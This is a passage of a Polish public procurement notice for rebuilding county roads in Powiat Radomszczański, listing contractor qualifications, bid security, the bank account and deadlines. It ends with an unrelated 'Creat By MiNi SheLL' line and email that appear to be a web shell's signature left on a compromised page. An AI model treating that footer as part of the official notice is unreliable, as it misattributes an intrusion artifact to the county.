lub lepszych, których zastosowanie w żaden sposób nie wpłynie negatywnie na prawidłowe funkcjonowanie rozwiązań przyjętych w PFU. Wykonawca, który zastosuje urządzenia lub materiały równoważne będzie obowiązany wykazać na etapie realizacji zamówienia, że zastosowane przez niego urządzenia i materiały spełniają wymagania określone przez Zamawiającego. <br/>Zamawiający wskazuje, że obowiązek zgłoszenia w ofercie rozwiązań równoważnych w stosunku do opisanych w opisie przedmiotu zamówienia i wykazania równoważności leży po stronie Wykonawcy. <br/>W przypadku gdy wymagania w opisie przedmiotu zamówienia odnoszą się do norm, europejskich ocen technicznych, specyfikacji technicznych, systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 Pzp, Zamawiający wymaga, aby Wykonawca przedstawił już w jego ofercie dowody równoważności w sposób określony w art. 101 ust. 5 i 6 Pzp.<br/>Wymagania jakościowe w związku z zastosowaniem kryterium ceny jako kryterium o wadze przekraczającej 60% odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia, zostały określone w programie funkcjonalno-użytkowym i projekcie umowy.<br/>3.Dokumentacja projektowa winna być opracowana w sposób zgodny z wymaganiami ustawy Prawo budowalne, ustaleniami określonymi w decyzjach administracyjnych dotyczących zamierzenia budowlanego, obowiązującymi przepisami oraz zasadami wiedzy technicznej, jak również zgodnie z wymaganiami zawartymi w niniejszej SWZ wraz z załącznikami. <br/>Wykonawca jest zobowiązany uzyskać wszelkie decyzje, uzgodnienia, warunki techniczne i pozwolenia niezbędne do rozpoczęcia, zakończenia i użytkowania robót przez Zamawiającego. Opłaty związane z uzyskaniem wszelkich uzgodnień, opinii i decyzji ponosi Wykonawca. Wykonawca winien uwzględnić w cenie wszelkie koszty sporządzenia dokumentacji wynikających z warunków właścicieli, administratorów i zarządców infrastruktury i obiektów. <br/>4. Roboty budowlane, należy realizować zgodnie ze sztuką budowlaną, dokumentacją projektową, Szczegółową Specyfikacją Techniczną Wykonania i Odbioru Robót, obowiązującymi przy wykonywaniu robót warunkami bezpieczeństwa i ochrony zdrowia oraz zgodnie z obowiązującymi przepisami i warunkami technicznymi.<br/>5. Wykonawca, zobowiązany jest przez cały okres budowy, prowadzić nadzór autorski nad opracowaną dokumentacją projektową.<br/>6. Po zakończeniu inwestycji Wykonawca, wykona kompleksową dokumentację powykonawczą. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie kryterium oceny ofert jakim jest Cena (C) – 100%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają następujące warunki udziału w postępowaniu dotyczące:<br/>1.Zdolności technicznej lub zawodowej (dotyczy części 1 i części 2).<br/>Wykonawca spełni warunek, w zakresie zdolności zawodowej, jeżeli wykaże, że:<br/>a) dysponuje jedną osobą projektanta posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń określone przepisami ustawy Prawo budowlane; <br/>b) dysponuje jedną osobą projektanta posiadającą uprawnienia do projektowania w specjalności inżynieryjnej drogowej bez ograniczeń określone przepisami ustawy Prawo budowlane; <br/>c) dysponuje jedną osobą projektanta posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych bez ograniczeń określone przepisami ustawy Prawo budowlane; <br/>d) dysponuje jedną osobą projektanta posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń określone przepisami ustawy Prawo budowlane; <br/>e) dysponuje jedną osobą, która pełnić będzie funkcję kierownika robót posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, określone przepisami ustawy Prawo budowlane, legitymującą się co najmniej dwuletnim doświadczeniem przy pełnieniu funkcji kierownika robót /kierownika budowy w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.<br/>f) dysponuje jedną osobą, która pełnić będzie funkcję kierownika budowy posiadającą uprawnienia budowlane w specjalności inżynieryjnej drogowej bez ograniczeń, określone przepisami ustawy Prawo budowlane, legitymującą się co najmniej dwuletnim doświadczeniem przy pełnieniu funkcji kierownika budowy/kierownika robót w specjalności inżynieryjnej drogowej bez ograniczeń lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.<br/>g) dysponuje jedną osobą, która pełnić będzie funkcję kierownika robót posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych bez ograniczeń, określone przepisami ustawy Prawo budowlane, legitymującą się co najmniej dwuletnim doświadczeniem przy pełnieniu funkcji kierownika robót/kierownika budowy w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych bez ograniczeń lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.<br/>h) dysponuje jedną osobą, która pełnić będzie funkcję kierownika robót posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, określone przepisami ustawy Prawo budowlane, legitymującą się co najmniej dwuletnim doświadczeniem przy pełnieniu funkcji kierownika robót /kierownika budowy w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.<br/>Uwaga:<br/>Wykonawca spełni warunek, o którym mowa w pkt 6.1.4. SWZ lit. a, b, c, d, e, f, g, h jeżeli będzie posiadał lub dysponował osobą, która posiada wszystkie uprawnienia łącznie lub kilkoma osobami posiadającymi wymagane uprawnienia i doświadczenie. Zamawiający nie wymaga by Wykonawca wykazał się posiadaniem 8 osób pełniących wskazane funkcje we wskazanych wyżej specjalnościach i posiadających stosowne doświadczenie, w sytuacji, gdy uprawnienia te posiada np. jedna, dwie, trzy lub więcej osób wskazanych przez Wykonawcę. Warunek stawiany przez Zamawiającego dotyczy uprawnień i doświadczenia nie zaś liczby osób spełniających te warunki. <br/>Wykonawca składający ofertę na więcej niż jedną część może wykazać się tymi samymi projektantami oraz kierownikami przy każdej części. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy (Wykonawcy wspólnie ubiegającego się o zamówienie, odpowiednio podmiotu udostępniającego zasoby) o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp, zgodnie z wzorem stanowiącym załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - stanowiący załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych w celu potwierdzenia zgodności oferowanych dostaw, usług lub robót budowlanych z wymaganiami, cechami lub kryteriami określonymi w opisie przedmiotu zamówienia lub wymaganiami związanymi z realizacją zamówienia z wyjątkiem przypadków, gdy Wykonawca oferuje rozwiązania równoważne. W takim przypadku Zamawiający żąda złożenia przedmiotowych środków dowodowych wraz z ofertą. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertę składa się na Formularzu Ofertowym – stanowiącym załącznik nr 1 do SWZ. Wraz z ofertą Wykonawca jest zobowiązany złożyć: <br/>1) aktualne na dzień składania ofert odpowiednio oświadczenie, o którym mowa w pkt. 7.1. SWZ (w przypadku składania oferty wspólnej lub poleganiu na zasobach podmiotu trzeciego oświadczenie, o którym mowa w pkt 7.1. należy złożyć zgodnie z wymogami wskazanymi w pkt 7.2.i/lub 7.3 SWZ).<br/> 2) zobowiązanie podmiotu udostępniającego zasoby, jeżeli Wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, o którym mowa w pkt 6.6. SWZ, (jeżeli dotyczy); <br/>3) oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o którym mowa w pkt 7.8.2. SWZ, (jeżeli dotyczy);<br/>4) dowód wniesienia wadium; <br/>5) dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (jeżeli dotyczy). <br/>6) dowody równoważności, jeżeli wykonawca zaoferował rozwiązania równoważne w stosunku do określonych w opisie przedmiotu zamówienia (jeżeli dotyczy).<br/>7) uzasadnienie zastrzeżenia tajemnicy przedsiębiorstwa (jeżeli dotyczy). W sytuacji, gdy oferta lub inne dokumenty składane w toku postępowania będą zawierać tajemnicę przedsiębiorstwa, Wykonawca wraz z przekazaniem takich informacji, zastrzega, że nie mogą być one udostępniane oraz wskazuje, że zastrzeżone informację stanowią tajemnicę przedsiębiorstwa w rozumieniu Ustawy z 16 kwietnia 1993 r. o zwalczaniu konkurencyjności. Wykonawca nie może zastrzec informacji, o których mowa w art. 222 ust 5 ustawy Pzp. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości dla:<br/>- Części 1 zamówienia – 58 000,00 PLN (słownie: pięćdziesiąt osiem tysięcy złotych 00/100);<br/>- Części 2 zamówienia – 16 000,00 PLN (słownie: szesnaście tysięcy złotych 00/100);<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą.<br/>3. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>4. Wykonawca może wnieść wadium w jednej lub kilku następujących formach:<br/>1) pieniądzu, przelewem na rachunek bankowy Zamawiającego w Banku VeloBank S.A.:<br/>Nr rachunku: 70 1560 0013 2013 3176 2000 0010<br/> z dopiskiem: Wadium – „Przebudowa odcinków dróg powiatowych nr 3923E, nr 3934E,nr 3931E” Część …….. .<br/>Uwaga: Za termin wniesienia zabezpieczenia w formie pieniężnej przyjmuje się termin uznania na rachunku Zamawiającego.<br/>Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone, jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania: <br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie Pzp. <br/>2) z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty <br/>wadium; <br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie; <br/>4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem, iż pierwszym dniem związania ofertą jest dzień składania ofert); <br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania, numer i nazwa części zamówienia; <br/>6) beneficjentem poręczenia lub gwarancji jest Powiat Radomszczański;<br/>7) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 ustawy Pzp.), Zamawiający wymaga, aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum). <br/>6. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o którym mowa w pkt. 4. ppkt 2-4 wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej.<br/>7. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa art. 98 ust. 2 pkt 3 ustawy Pzp zostanie odrzucona.<br/>8. Zamawiający będzie dokonywał zwrotu wadium zgodnie z zasadami określonymi w art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt. 7.1. SWZ składa każdy z wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są złożyć oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonują poszczególni wykonawcy. Wzór oświadczenia stanowi załącznik nr 5 do SWZ.<br/>4. W przypadku, o którym mowa w pkt 1 wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>5.W przypadku, gdy wykonawcę reprezentuje pełnomocnik wraz z ofertą winno być złożone pełnomocnictwo dla tej osoby określające jego zakres. Pełnomocnictwo winno być podpisane przez osoby uprawnione do reprezentowania Wykonawcy. <br/>6. Pełnomocnictwo do złożenia oferty musi być sporządzone i przekazane Zamawiającemu zgodnie z wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452). <br/>7. Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 ustawy Pzp oraz wskazanym w Projekcie Umowy, stanowiącym załącznik nr 7a do SWZ dla Części 1 oraz załącznik nr 7b do SWZ dla Części 2. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-06-23 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę przy użyciu środków komunikacji elektronicznej za pośrednictwem https://platformazakupowa.pl pod adresem https://platformazakupowa.pl/transakcja/772856</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-06-23 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-07-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> C.d. z Część 1 - 4.2.2.) Krótki opis przedmiotu zamówienia:<br/>3. Dokumentacja projektowa winna być opracowana w sposób zgodny z wymaganiami ustawy Prawo budowalne, ustaleniami określonymi w decyzjach administracyjnych dotyczących zamierzenia budowlanego, obowiązującymi przepisami oraz zasadami wiedzy technicznej, jak również zgodnie z wymaganiami zawartymi w niniejszej SWZ wraz z załącznikami. <br/>Wykonawca jest zobowiązany uzyskać wszelkie decyzje, uzgodnienia, warunki techniczne i pozwolenia niezbędne do rozpoczęcia, zakończenia i użytkowania robót przez Zamawiającego. Opłaty związane z uzyskaniem wszelkich uzgodnień, opinii i decyzji ponosi Wykonawca. Wykonawca winien uwzględnić w cenie wszelkie koszty sporządzenia dokumentacji wynikających z warunków właścicieli, administratorów i zarządców infrastruktury i obiektów. <br/>4. Roboty budowlane, należy realizować zgodnie ze sztuką budowlaną, dokumentacją projektową, Szczegółową Specyfikacją Techniczną Wykonania i Odbioru Robót, obowiązującymi przy wykonywaniu robót warunkami bezpieczeństwa i ochrony zdrowia oraz zgodnie z obowiązującymi przepisami i warunkami technicznymi.<br/>5. Wykonawca, zobowiązany jest przez cały okres budowy, prowadzić nadzór autorski nad opracowaną dokumentacją projektową.<br/>6. Po zakończeniu inwestycji Wykonawca, wykona kompleksową dokumentację powykonawczą.<br/><br/>Ciąg dalszy Sekcji IV pkt. 4.2.10) - dotyczy Części 1 i Części 2 zamówienia<br/>Wykonawca obowiązany jest wykonać przedmiot zamówienia w terminie 18 miesięcy od dnia podpisania umowy w następujących etapach: <br/>1) etap I obejmujący wykonanie dokumentacji projektowej oraz robót o łącznej wartości co najmniej 35% wynagrodzenia brutto określonego w § 17 ust. 1 umowy - w terminie 14 miesięcy od dnia zawarcia umowy,<br/>2) etap II obejmujący wykonanie robót o wartości co najmniej 30% wynagrodzenia brutto określonego w § 17 ust. 1 umowy - w terminie 16 miesięcy od dnia zawarcia umowy,<br/>3) etap III pozostały zakres przedmiotu umowy - w terminie 18 miesięcy od dnia zawarcia umowy.<br/><br/>Zgodnie z art. 1 pkt. 3 Ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego w celu przeciwdziałania wspieraniu agresji Federacji Rosyjskiej na Ukrainę rozpoczętej w dniu 24 lutego 2022r., wobec osób i podmiotów wpisanych na listę, o której mowa w art. 2 ustawy, stosuje się sankcje polegające m.in. na wykluczeniu z postępowania o udzielenie zamówienia publicznego prowadzonego na podstawie ustawy z dnia 11 września 2019r. Prawo zamówień publicznych. <br/><br/>Na podstawie art. 7 ust. 1 w/w ustawy Zamawiający wykluczy:<br/>1)	wykonawcę wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt. 3;<br/>2)	wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022r. poz. 593, 655, 835, 2180 i 2185) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt.3;<br/>3)	wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt. 37 ustawy z dnia 29 września o rachunkowości (Dz. U. z 2021r. poz. 217, 2105 i 2106 oraz z 2022r., poz. 1488) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt. 3. <br/>Wykluczenie następuje na okres trwania www. okoliczności.

Creat By MiNi SheLL
Email: jattceo@gmail.com